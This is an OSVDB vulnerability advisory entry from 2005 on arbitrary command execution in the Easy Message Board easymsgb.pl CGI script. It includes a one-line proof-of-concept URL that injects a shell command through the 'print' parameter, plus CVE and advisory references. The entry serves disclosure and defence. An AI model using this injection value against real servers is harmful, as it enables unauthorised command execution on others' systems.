Easy Message Board easymsgb.pl print Parameter Arbitrary Command Execution

2005-05-08T11:17:18
ID OSVDB:16163
Type osvdb
Reporter OSVDB
Modified 2005-05-08T11:17:18

Description

Manual Testing Notes

http://[victim]/cgi-bin/emsgb/easymsgb.pl?print=|id|

References:

Vendor URL: http://www.geocentral.net/colscripts/index.html Security Tracker: 1013920 Secunia Advisory ID:15295 Related OSVDB ID: 16162 Other Advisory URL: http://www.soulblack.com.ar/repo/papers/easymsgb_advisory.txt Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-05/0132.html CVE-2005-1550 Bugtraq ID: 13555